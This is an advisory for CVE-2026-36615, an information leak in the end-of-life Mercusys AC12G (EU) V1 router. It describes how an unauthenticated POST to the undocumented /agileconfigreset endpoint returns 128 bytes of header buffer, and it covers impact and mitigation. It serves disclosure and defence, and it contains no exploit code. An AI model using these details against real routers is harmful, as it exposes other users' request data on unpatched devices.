CVE-2026-36615

Vulnerability

A Mercusys AC12G (EU) V1 router, specifically firmware versions AC12G(EU)_V1_200909 and AC12G(EU)_V1_210128, contains an undocumented /agileconfigreset endpoint. This endpoint is reachable by unauthenticated attackers on the adjacent network and, when accessed via POST requests, returns internal buffer contents.

Exploitation

An attacker on the adjacent network can send an unauthenticated POST request to the /agileconfigreset endpoint. The router will respond with a malformed HTTP response that includes 128 bytes from its internal HTTP header parse buffer, prepended to the actual response body. This buffer contains null-separated key-value pairs of parsed HTTP headers from the current request [1].

Impact

Successful exploitation of this vulnerability results in the disclosure of sensitive information. The leaked buffer can contain parsed HTTP headers from the current request, potentially aiding attackers in reconnaissance for further attacks. Since a shared buffer pool is used, data from other clients' requests may also be exposed [1].

Mitigation

The affected product, Mercusys AC12G (EU) V1, is end-of-life, and no fix is planned. Recommended remediation includes removing the undocumented /agileconfigreset endpoint from production firmware or requiring authentication and proper error handling if the endpoint must remain. Response buffers should also be initialized before use [1].